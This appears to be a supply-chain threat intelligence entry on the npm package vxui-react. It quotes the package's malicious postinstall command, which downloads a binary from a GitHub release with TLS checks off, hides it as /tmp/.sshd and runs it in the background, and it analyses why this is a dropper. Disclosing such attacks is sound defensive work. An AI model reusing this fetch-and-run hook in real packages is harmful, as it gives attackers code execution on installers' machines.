Supply-chain threat intelligence
Risk score: 92
Indexed incident for vxui-react (npm).
package.json declares a postinstall script that runs curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &. On every npm install vxui-react, this fetches an opaque binary from a personal GitHub user (parikhpreyash4) unrelated to the package's publisher, with TLS verification explicitly disabled (-k), errors suppressed, the file staged to a hidden path masquerading as the SSH daemon (/tmp/.sshd), made executable, and launched detached in the background. The package advertises itself as a React UI component library; no legitimate purpose for this exists. The fetched URL is mutable (releases/latest), unsigned, and unverified. This is a classic install-time remote code execution dropper.
Affected versions
Indicators
Timeline